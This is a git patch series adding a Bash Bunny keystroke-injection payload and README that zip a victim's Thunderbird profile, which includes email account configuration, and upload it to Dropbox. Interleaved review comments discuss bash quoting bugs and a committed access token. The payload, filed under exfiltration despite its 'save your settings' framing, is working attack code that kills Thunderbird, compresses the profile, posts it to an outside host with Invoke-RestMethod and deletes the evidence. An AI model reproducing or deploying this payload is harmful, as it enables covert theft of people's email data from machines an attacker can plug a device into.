From 0b07031a1fcf35b0fe410c088db12c4886640cb5 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 3 Jun 2024 14:18:21 +0200 Subject: [PATCH 1/7] Save Your Thunderbird Settings via Dropbox This payload is designed in order to make Thunderbird configuration extraction immediate so that you can work in speed. --- .../Save_Your_Thunderbird_Settings/README.md | 128 ++++++++++++++++++ .../payload.txt | 121 +++++++++++++++++ 2 files changed, 249 insertions(+) create mode 100644 payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md create mode 100644 payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md new file mode 100644 index 000000000..bb6d830af --- /dev/null +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md 
@@ -0,0 +1,128 @@ +# Save Your Thunderbird Settings via Dropbox + +Thunderbird version, build ID, user agent, host machine information (RAM, available space, GPU...), email account configuration and much more available through this juicy Thunderbird feature. + +This payload is designed in order to make Thunderbird configuration extraction immediate so that you can work in speed. It can be used, for istance, in case you have a lot of devices and want to quickly and manually save every single Thunderbird configuration. + +**Alert!** I have also uploaded my personal Dropbox token, please don't use it because I need it for my own stuff! + +**Category:** Exfiltration + +## Index + +- [Overview](#overview) +- [Requirements](#requirements) +- [Test Environment](#test-environment) +- [Configuration](#configuration) +- [Functionality](#functionality) + - [System Detection](#system-detection) + - [Opening Thunderbird](#opening-thunderbird) + - [Copying Profile Folder Path](#copying-profile-folder-path) + - [Opening PowerShell and Uploading to Dropbox](#opening-powershell-and-uploading-to-dropbox) +- [Notes](#notes) +- [Credits](#credits) + +## Overview + +This program automates the process of saving your Thunderbird settings to Dropbox. It is designed for Windows 10/11 systems and falls under the exfiltration category. The main functionality includes detecting the system state, opening Thunderbird, copying the profile folder path, compressing the profile folder, and uploading it to Dropbox. + +## Requirements + +- **Dropbox Access Token:** You need a valid Dropbox access token to upload the file. +- **PowerShell:** The script uses PowerShell to execute commands and interact with the filesystem. +- **Thunderbird:** In order to exfiltrate the Thunderbird configuration, it is essential to have Thunderbird configured...obvious right? And yet... 
+ +## Test Environment + +- Thunderbird 115.11.1 (64 bit) +- Windows 10 Pro + +## Configuration + +Before running the program, ensure to set the following parameters correctly/as you prefer: + +- `#ACCESS_TOKEN`: Your private Dropbox access token, i.e. mine is aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== +- `#ARCHIVE_NAME`: The name of the archive file to be created (e.g., `cache.zip`). +- `#DROPBOX_FOLDER_PATH`: The path in your Dropbox where the file will be uploaded (e.g., `/`). + +### I.E. + +- 1° + +```plaintext +[79] * REM Required replace '[2]': Set here the archive name, you must use the same! +[80] QUACK STRING -DestinationPath ./cache.zip +``` + +- 2° + +```plaintext +[85] * REM Required replace '[2]': Set here the archive name, you must use the same! +[86] QUACK STRING $filePath = "$env:TEMP/[2]" +``` + +- 3° + +```plaintext +[93] * REM Required replace '[2]': Set here the archive name, you must use the same! +[94] * REM Required replace '[3]': Set here the path of your dropbox folder, i.e. '/' +[95] QUACK STRING $dropboxPath = "/cache.zip" +``` + +- 4° + +```plaintext +[97] * REM Required replace '[1]': Set here your Dropbox access TOKEN +[98] QUACK STRING $accessToken = "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" +``` + +## Functionality + +### System Detection + +The program starts by detecting whether the system reflects the CAPSLOCK state. This is used to set a dynamic boot delay. If CAPSLOCK is not reflected, a maximum delay of 3000ms is applied. + +### Opening Thunderbird + +The script then opens Thunderbird and navigates through the settings to locate the profile folder. This path is copied to the clipboard for further use. + +### Copying Profile Folder Path + +The copied path of the Thunderbird profile folder is used to compress the profile data into a ZIP file. + +### Opening PowerShell and Uploading to Dropbox + +Using PowerShell, the script performs the following actions: + +1. 
**Navigate to TEMP Directory:** Changes the directory to the temporary environment path. +2. **Stop Thunderbird Process:** Stops the Thunderbird process to ensure the profile data is not being used. +3. **Compress Profile Folder:** Compresses the profile folder into a ZIP file. +4. **Upload to Dropbox:** Uploads the ZIP file to the specified Dropbox folder using the Dropbox API. +5. **Cleanup:** Removes the local ZIP file after the upload is complete. + +## Notes + +- This program was created for educational and demonstrative purposes. Unauthorized access and exfiltration of data is illegal. +- Ensure you have the necessary permissions before running any script that modifies or transfers personal or sensitive data. + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github +
+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt new file mode 100644 index 000000000..6d35d21f3 --- /dev/null +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt 
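Review bot: This README hunk commits what the author describes as a personal Dropbox access token (the `**Alert!**` line and the `#ACCESS_TOKEN` bullet both carry the value); a credential must never be checked in, even with a request not to use it, because the repository is public and the value stays in git history. Replace it with an obvious placeholder such as `<YOUR_DROPBOX_TOKEN>` and, if the token is real, revoke it in the Dropbox app console. Two documentation mismatches in the same hunk: the "System Detection" subsection claims the payload checks CAPSLOCK state and applies a dynamic boot delay of up to 3000ms, but the payload.txt added in this patch opens with a fixed `QUACK DELAY 1500` and contains no such check, so either implement it or drop the subsection and its index entry; and the `[79]`, `[80]` ... `[98]` references in the "I.E." section are raw line numbers that go stale on every edit (later patches in this series bump them twice), so point at the `REM` marker text instead. Minor: "istance" should be "instance".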
@@ -0,0 +1,121 @@ +* REM ############################################################### +* REM # # +* REM # Title : Save Your Thunderbird Settings via Dropbox # +* REM # Author : Aleff # +* REM # Version : 1.0 # +* REM # Category : Exfiltration # +* REM # Target : Windows 10/11 # +* REM # # +* REM ############################################################### + +* REM Opening Thunderbird settings +QUACK DELAY 1500 +QUACK WIN r +QUACK STRING thunderbird +QUACK ENTER +QUACK DELAY 1000 +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK DELAY 500 +QUACK ENTER +QUACK DELAY 500 +QUACK UPARROW +QUACK UPARROW +QUACK DELAY 500 +QUACK ENTER +QUACK DELAY 500 +QUACK UPARROW +QUACK UPARROW +QUACK UPARROW +QUACK DELAY 500 +QUACK ENTER +QUACK DELAY 500 + +* REM Inside the settings +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK DELAY 500 +QUACK ENTER +QUACK DELAY 500 + +* REM Inside The Profile Folder +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK DELAY 500 +QUACK ENTER +QUACK DELAY 500 +QUACK CTRL c +QUACK DELAY 500 +QUACK ALT F4 +QUACK DELAY 500 + +* REM Powershell running... +QUACK WIN R +QUACK STRING powershell +QUACK ENTER +QUACK DELAY 1500 +QUACK STRING cd $env:TEMP +QUACK ENTER +QUACK DELAY 500 +QUACK STRING Stop-Process -Name "thunderbird" -Force +QUACK ENTER +QUACK DELAY 500 +QUACK STRING Compress-Archive -LiteralPath +QUACK DELAY 500 +QUACK CTRL v +QUACK DELAY 500 +* REM Required replace '[2]': Set here the archive name, you must use the same! +QUACK STRING -DestinationPath ./[2] +QUACK ENTER +QUACK DELAY 1000 + +* REM Exfiltration via Dropbox +* REM Required replace '[2]': Set here the archive name, you must use the same! +QUACK STRING $filePath = "$env:TEMP/[2]" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $filePath = $filePath -replace "\\", "/" +QUACK ENTER +QUACK DELAY 500 +* REM Required replace '[2]': Set here the archive name, you must use the same! 
+* REM Required replace '[3]': Set here the path of your dropbox folder, i.e. '/' +QUACK STRING $dropboxPath = "[3][2]" +QUACK ENTER +QUACK DELAY 500 +* REM Required replace '[1]': Set here your Dropbox access TOKEN, i.e. mine is aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== +QUACK STRING $accessToken = "[1]" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $fileContent = [System.IO.File]::ReadAllBytes($filePath) +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $headers = @{ +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "Authorization" = "Bearer $accessToken" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "Dropbox-API-Arg" = ("{`"path`": `"" + $dropboxPath + "`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}") +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "Content-Type" = "application/octet-stream" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING } +QUACK ENTER +QUACK DELAY 500 +QUACK STRING Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit +QUACK ENTER \ No newline at end of file From f158977fdfe54cb5abd26d9d6de84f9fa0d5e4de Mon Sep 17 00:00:00 2001 From: Aleff Date: Tue, 4 Jun 2024 08:13:29 +0200 Subject: [PATCH 2/7] Update payload.txt --- .../exfiltration/Save_Your_Thunderbird_Settings/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index 6d35d21f3..a5e0ece79 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -10,7 +10,7 @@ * REM Opening Thunderbird settings QUACK DELAY 1500 -QUACK WIN r +QUACK GUI r QUACK STRING thunderbird QUACK ENTER QUACK DELAY 1000 
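Review bot: On the initial payload.txt hunk (PATCH 1/7): a Bash Bunny payload.txt is run by bash, and the later patches in this series treat it that way (shell variable assignments, `ATTACKMODE`, `#` comments), yet none of the PowerShell lines here are quoted for bash. `* REM ...` is not a bash comment (a leading unquoted `*` is a glob, so each of those lines is executed, not skipped), the `"..."` and `$env:TEMP` / `$filePath` tokens in the `QUACK STRING` lines are consumed by bash before QUACK ever sees them, and the `Dropbox-API-Arg` line contains unquoted parentheses and backticks that bash will not accept as a plain argument. PATCH 5/7, 6/7 and 7/7 patch these one character class at a time; it would be cleaner to fix the quoting once in this commit and confirm, on the test environment the README names, that the text typed on the target matches what the README's "I.E." section shows. The `[1]`/`[2]`/`[3]` placeholders are also duplicated across four `REM` lines, which is what PATCH 3/7 later replaces with variables.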
@@ -63,7 +63,7 @@ QUACK ALT F4 QUACK DELAY 500 * REM Powershell running... -QUACK WIN R +QUACK GUI r QUACK STRING powershell QUACK ENTER QUACK DELAY 1500 From a39f4feae3bfffcbb46635fa0de24c0cfa998391 Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 6 Jun 2024 11:11:40 +0200 Subject: [PATCH 3/7] Adapted to the use of variables --- .../Save_Your_Thunderbird_Settings/README.md | 35 ++++++++++--------- .../payload.txt | 21 +++++------ 2 files changed, 30 insertions(+), 26 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md index bb6d830af..b3595609c 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md 
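Review bot: On PATCH 2/7, the subject "Update payload.txt" says nothing about the change; both hunks replace `WIN` with `GUI` (and normalise `R` to `r` in the second), so a subject such as "Use GUI key name instead of WIN" would let the history explain itself.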
@@ -41,39 +41,42 @@ This program automates the process of saving your Thunderbird settings to Dropbo Before running the program, ensure to set the following parameters correctly/as you prefer: -- `#ACCESS_TOKEN`: Your private Dropbox access token, i.e. mine is aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== -- `#ARCHIVE_NAME`: The name of the archive file to be created (e.g., `cache.zip`). -- `#DROPBOX_FOLDER_PATH`: The path in your Dropbox where the file will be uploaded (e.g., `/`). +- `#ACCESS_TOKEN`: Your private Dropbox access token +- `#ARCHIVE_NAME`: The name of the archive file to be created. +- `#DROPBOX_FOLDER_PATH`: The path in your Dropbox where the file will be uploaded. ### I.E. -- 1° +- **Configuration** + +```shell +ARCHIVE_NAME="cache.zip" +ACCESS_TOKEN="aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" +DROPBOX_FOLDER_PATH="/" +``` + +- **1°** ```plaintext -[79] * REM Required replace '[2]': Set here the archive name, you must use the same! -[80] QUACK STRING -DestinationPath ./cache.zip +[86] QUACK STRING -DestinationPath ./cache.zip ``` -- 2° +- **2°** ```plaintext -[85] * REM Required replace '[2]': Set here the archive name, you must use the same! -[86] QUACK STRING $filePath = "$env:TEMP/[2]" +[91] QUACK STRING $filePath = "$env:TEMP/cache.zip" ``` -- 3° +- **3°** ```plaintext -[93] * REM Required replace '[2]': Set here the archive name, you must use the same! -[94] * REM Required replace '[3]': Set here the path of your dropbox folder, i.e. '/' -[95] QUACK STRING $dropboxPath = "/cache.zip" +[97] QUACK STRING $dropboxPath = "/cache.zip" ``` -- 4° +- **4°** ```plaintext -[97] * REM Required replace '[1]': Set here your Dropbox access TOKEN -[98] QUACK STRING $accessToken = "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" +[100] QUACK STRING $accessToken = "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" ``` ## Functionality 
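Review bot: In this README hunk the "I.E." items no longer show the payload lines: the README now quotes `[86] QUACK STRING -DestinationPath ./cache.zip`, while the payload.txt hunk in the same patch has `QUACK STRING -DestinationPath ./$ARCHIVE_NAME` at that position (likewise for `$filePath`, `$dropboxPath` and `$accessToken`), so the examples document the expanded values rather than what a reader will find in the file. Either quote the variable form or state that these are the values after expansion. The new `shell` configuration block still carries the committed `ACCESS_TOKEN` value, which should be a placeholder, and the `#ACCESS_TOKEN` bullet lost its trailing period while the other two kept theirs.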
diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index a5e0ece79..967d20901 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -8,6 +8,12 @@ * REM # # * REM ############################################################### +* REM Variables Settings +ARCHIVE_NAME="cache.zip" +ACCESS_TOKEN="aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" +DROPBOX_FOLDER_PATH="/" +DROPBOX_CONST_LINK ="https://content.dropboxapi.com/2/files/upload" + * REM Opening Thunderbird settings QUACK DELAY 1500 QUACK GUI r @@ -77,26 +83,21 @@ QUACK STRING Compress-Archive -LiteralPath QUACK DELAY 500 QUACK CTRL v QUACK DELAY 500 -* REM Required replace '[2]': Set here the archive name, you must use the same! -QUACK STRING -DestinationPath ./[2] +QUACK STRING -DestinationPath ./$ARCHIVE_NAME QUACK ENTER QUACK DELAY 1000 * REM Exfiltration via Dropbox -* REM Required replace '[2]': Set here the archive name, you must use the same! -QUACK STRING $filePath = "$env:TEMP/[2]" +QUACK STRING $filePath = "$env:TEMP/$ARCHIVE_NAME" QUACK ENTER QUACK DELAY 500 QUACK STRING $filePath = $filePath -replace "\\", "/" QUACK ENTER QUACK DELAY 500 -* REM Required replace '[2]': Set here the archive name, you must use the same! -* REM Required replace '[3]': Set here the path of your dropbox folder, i.e. '/' -QUACK STRING $dropboxPath = "[3][2]" +QUACK STRING $dropboxPath = "$DROPBOX_FOLDER_PATH$ARCHIVE_NAME" QUACK ENTER QUACK DELAY 500 -* REM Required replace '[1]': Set here your Dropbox access TOKEN, i.e. mine is aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ== -QUACK STRING $accessToken = "[1]" +QUACK STRING $accessToken = "$ACCESS_TOKEN" QUACK ENTER QUACK DELAY 500 QUACK STRING $fileContent = [System.IO.File]::ReadAllBytes($filePath) 
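Review bot: On the PATCH 3/7 payload.txt hunks: `DROPBOX_CONST_LINK ="https://..."` has a space before `=`, so bash parses it as running a command named `DROPBOX_CONST_LINK` with one argument instead of assigning the variable; PATCH 5/7 fixes this, and that fix belongs squashed into this commit. Moving the values into shell variables also means bash now expands every `$...` in the `QUACK STRING` lines, and that includes `$filePath`, `$dropboxPath` and `$env:TEMP`, which are meant to reach PowerShell literally; that is the breakage PATCH 7/7 later escapes, so the payload at this commit does not type what the README describes. The token value is again committed in `ACCESS_TOKEN=`.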
@@ -117,5 +118,5 @@ QUACK DELAY 500 QUACK STRING } QUACK ENTER QUACK DELAY 500 -QUACK STRING Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit +QUACK STRING Invoke-RestMethod -Uri "$DROPBOX_CONST_LINK" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit QUACK ENTER \ No newline at end of file From 061a5071b0395931ce6ce30079ffe5aa1a10aa43 Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 6 Jun 2024 15:58:44 +0200 Subject: [PATCH 4/7] [+] ATTACKMODE --- .../exfiltration/Save_Your_Thunderbird_Settings/README.md | 8 ++++---- .../Save_Your_Thunderbird_Settings/payload.txt | 2 ++ 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md index b3595609c..bdf38ef01 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/README.md @@ -58,25 +58,25 @@ DROPBOX_FOLDER_PATH="/" - **1°** ```plaintext -[86] QUACK STRING -DestinationPath ./cache.zip +[88] QUACK STRING -DestinationPath ./cache.zip ``` - **2°** ```plaintext -[91] QUACK STRING $filePath = "$env:TEMP/cache.zip" +[93] QUACK STRING $filePath = "$env:TEMP/cache.zip" ``` - **3°** ```plaintext -[97] QUACK STRING $dropboxPath = "/cache.zip" +[99] QUACK STRING $dropboxPath = "/cache.zip" ``` - **4°** ```plaintext -[100] QUACK STRING $accessToken = "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" +[102] QUACK STRING $accessToken = "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" ``` ## Functionality diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index 967d20901..134d3c4dc 100644 
--- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -8,6 +8,8 @@ * REM # # * REM ############################################################### +ATTACKMODE HID + * REM Variables Settings ARCHIVE_NAME="cache.zip" ACCESS_TOKEN="aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" From a1f6b5124f35320511cdb4a37c57dbe9be9fc4a9 Mon Sep 17 00:00:00 2001 From: Aleff Date: Sun, 9 Jun 2024 11:50:08 +0200 Subject: [PATCH 5/7] Update payload.txt --- .../payload.txt | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index 134d3c4dc..2a1f6239d 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -14,7 +14,7 @@ ATTACKMODE HID ARCHIVE_NAME="cache.zip" ACCESS_TOKEN="aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" DROPBOX_FOLDER_PATH="/" -DROPBOX_CONST_LINK ="https://content.dropboxapi.com/2/files/upload" +DROPBOX_CONST_LINK="https://content.dropboxapi.com/2/files/upload" * REM Opening Thunderbird settings QUACK DELAY 1500 @@ -78,7 +78,7 @@ QUACK DELAY 1500 QUACK STRING cd $env:TEMP QUACK ENTER QUACK DELAY 500 -QUACK STRING Stop-Process -Name "thunderbird" -Force +QUACK STRING Stop-Process -Name \"thunderbird\" -Force QUACK ENTER QUACK DELAY 500 QUACK STRING Compress-Archive -LiteralPath 
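Review bot: On PATCH 4/7: adding `ATTACKMODE HID` is the right fix, since the payload never set an attack mode before, but the README's Requirements section (Dropbox token, PowerShell, Thunderbird) still does not say the payload needs HID mode on the device. The README hunk bumps the hard-coded line numbers a second time (`[86]` to `[88]` and so on), which confirms the "I.E." section should anchor on the quoted command text rather than on line numbers. The first PATCH 5/7 hunk that follows (`DROPBOX_CONST_LINK=` without the space) corrects the assignment introduced in PATCH 3/7.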
@@ -90,16 +90,16 @@ QUACK ENTER QUACK DELAY 1000 * REM Exfiltration via Dropbox -QUACK STRING $filePath = "$env:TEMP/$ARCHIVE_NAME" +QUACK STRING $filePath = \"$env:TEMP/$ARCHIVE_NAME\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $filePath = $filePath -replace "\\", "/" +QUACK STRING $filePath = $filePath -replace \"\\\", \"/\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $dropboxPath = "$DROPBOX_FOLDER_PATH$ARCHIVE_NAME" +QUACK STRING $dropboxPath = \"$DROPBOX_FOLDER_PATH$ARCHIVE_NAME\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $accessToken = "$ACCESS_TOKEN" +QUACK STRING $accessToken = \"$ACCESS_TOKEN\" QUACK ENTER QUACK DELAY 500 QUACK STRING $fileContent = [System.IO.File]::ReadAllBytes($filePath) @@ -108,17 +108,17 @@ QUACK DELAY 500 QUACK STRING $headers = @{ QUACK ENTER QUACK DELAY 500 -QUACK STRING "Authorization" = "Bearer $accessToken" +QUACK STRING \"Authorization\" = \"Bearer $accessToken\" QUACK ENTER QUACK DELAY 500 -QUACK STRING "Dropbox-API-Arg" = ("{`"path`": `"" + $dropboxPath + "`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}") +QUACK STRING \"Dropbox-API-Arg\" = (\"{`\"path`\": `\"\" + $dropboxPath + \"`\", `\"mode`\": `\"add`\", `\"autorename`\": true, `\"mute`\": false}\") QUACK ENTER QUACK DELAY 500 -QUACK STRING "Content-Type" = "application/octet-stream" +QUACK STRING \"Content-Type\" = \"application/octet-stream\" QUACK ENTER QUACK DELAY 500 QUACK STRING } QUACK ENTER QUACK DELAY 500 -QUACK STRING Invoke-RestMethod -Uri "$DROPBOX_CONST_LINK" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit -QUACK ENTER \ No newline at end of file +QUACK STRING Invoke-RestMethod -Uri \"$DROPBOX_CONST_LINK\" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit +QUACK ENTER From a34529bfa4019899d87bc8030b6764b3774cdd81 Mon Sep 17 00:00:00 2001 
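Review bot: On the PATCH 5/7 escaping hunks: `\"` is needed so bash passes the double quotes through to the typed PowerShell, but the escaping in this hunk is incomplete and in one place changes meaning. `-replace \"\\\"` no longer yields the two-backslash regex the original `-replace "\\", "/"` line intended, because bash collapses `\\` to a single backslash before QUACK sees it, and the `Dropbox-API-Arg` line still carries unescaped parentheses and backticks that bash interprets before QUACK. Escaping one character class per commit is how these slip through; run the whole payload once on the test environment listed in the README and diff the typed text against the README's "I.E." section. Dropping the missing final newline is fine.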
From: Aleff Date: Sun, 9 Jun 2024 14:13:34 +0200 Subject: [PATCH 6/7] Update payload.txt --- .../payload.txt | 30 +++++++++---------- 1 file changed, 15 insertions(+), 15 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index 2a1f6239d..e5bda9d42 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -1,22 +1,22 @@ -* REM ############################################################### -* REM # # -* REM # Title : Save Your Thunderbird Settings via Dropbox # -* REM # Author : Aleff # -* REM # Version : 1.0 # -* REM # Category : Exfiltration # -* REM # Target : Windows 10/11 # -* REM # # -* REM ############################################################### +############################################################### +# # +# Title : Save Your Thunderbird Settings via Dropbox # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration # +# Target : Windows 10/11 # +# # +############################################################### ATTACKMODE HID -* REM Variables Settings +# Variables Settings ARCHIVE_NAME="cache.zip" ACCESS_TOKEN="aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1Sdlk1cGxvbzFPSQ==" DROPBOX_FOLDER_PATH="/" DROPBOX_CONST_LINK="https://content.dropboxapi.com/2/files/upload" -* REM Opening Thunderbird settings +# Opening Thunderbird settings QUACK DELAY 1500 QUACK GUI r QUACK STRING thunderbird @@ -41,7 +41,7 @@ QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 -* REM Inside the settings +# Inside the settings QUACK TAB QUACK TAB QUACK TAB @@ -57,7 +57,7 @@ QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 -* REM Inside The Profile Folder +# Inside The Profile Folder QUACK TAB QUACK TAB QUACK TAB 
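Review bot: On the PATCH 6/7 comment hunks: replacing `* REM` with `#` is correct, since `#` is the bash comment marker and a leading unquoted `*` was a glob that turned every "comment" into a command. The subject "Update payload.txt" hides that; "Replace REM pseudo-comments with bash comments" would describe it. Minor: the header block still says `Version : 1.0` after six functional revisions, and the `ACCESS_TOKEN=` value carried through unchanged is still the committed token.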
@@ -70,7 +70,7 @@ QUACK DELAY 500 QUACK ALT F4 QUACK DELAY 500 -* REM Powershell running... +# Powershell running... QUACK GUI r QUACK STRING powershell QUACK ENTER @@ -89,7 +89,7 @@ QUACK STRING -DestinationPath ./$ARCHIVE_NAME QUACK ENTER QUACK DELAY 1000 -* REM Exfiltration via Dropbox +# Exfiltration via Dropbox QUACK STRING $filePath = \"$env:TEMP/$ARCHIVE_NAME\" QUACK ENTER QUACK DELAY 500 From a6b8651e9bbcc5881791e72607435f8d026111e1 Mon Sep 17 00:00:00 2001 From: Aleff Date: Tue, 11 Jun 2024 07:45:18 +0200 Subject: [PATCH 7/7] Update payload.txt --- .../payload.txt | 21 ++++++++----------- 1 file changed, 9 insertions(+), 12 deletions(-) diff --git a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt index e5bda9d42..83d6d5572 100644 --- a/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt +++ b/payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt @@ -75,7 +75,7 @@ QUACK GUI r QUACK STRING powershell QUACK ENTER QUACK DELAY 1500 -QUACK STRING cd $env:TEMP +QUACK STRING cd \$env:TEMP QUACK ENTER QUACK DELAY 500 QUACK STRING Stop-Process -Name \"thunderbird\" -Force 
@@ -90,28 +90,25 @@ QUACK ENTER QUACK DELAY 1000 # Exfiltration via Dropbox -QUACK STRING $filePath = \"$env:TEMP/$ARCHIVE_NAME\" +QUACK STRING \$filePath = \"\$env:TEMP/$ARCHIVE_NAME\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $filePath = $filePath -replace \"\\\", \"/\" +QUACK STRING \$filePath = \$filePath -replace \"\\\", \"/\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $dropboxPath = \"$DROPBOX_FOLDER_PATH$ARCHIVE_NAME\" +QUACK STRING \$dropboxPath = \"$DROPBOX_FOLDER_PATH$ARCHIVE_NAME\" QUACK ENTER QUACK DELAY 500 -QUACK STRING $accessToken = \"$ACCESS_TOKEN\" +QUACK STRING \$fileContent = [System.IO.File]::ReadAllBytes(\$filePath) QUACK ENTER QUACK DELAY 500 -QUACK STRING $fileContent = [System.IO.File]::ReadAllBytes($filePath) +QUACK STRING \$headers = @{ QUACK ENTER QUACK DELAY 500 -QUACK STRING $headers = @{ +QUACK STRING \"Authorization\" = \"Bearer $ACCESS_TOKEN\" QUACK ENTER QUACK DELAY 500 -QUACK STRING \"Authorization\" = \"Bearer $accessToken\" -QUACK ENTER -QUACK DELAY 500 -QUACK STRING \"Dropbox-API-Arg\" = (\"{`\"path`\": `\"\" + $dropboxPath + \"`\", `\"mode`\": `\"add`\", `\"autorename`\": true, `\"mute`\": false}\") +QUACK STRING \"Dropbox-API-Arg\" = (\"{`\"path`\": `\"\" + \$dropboxPath + \"`\", `\"mode`\": `\"add`\", `\"autorename`\": true, `\"mute`\": false}\") QUACK ENTER QUACK DELAY 500 QUACK STRING \"Content-Type\" = \"application/octet-stream\" @@ -120,5 +117,5 @@ QUACK DELAY 500 QUACK STRING } QUACK ENTER QUACK DELAY 500 -QUACK STRING Invoke-RestMethod -Uri \"$DROPBOX_CONST_LINK\" -Method Post -Headers $headers -Body $fileContent; rm $filePath; exit +QUACK STRING Invoke-RestMethod -Uri \"$DROPBOX_CONST_LINK\" -Method Post -Headers \$headers -Body \$fileContent; rm \$filePath; exit QUACK ENTER
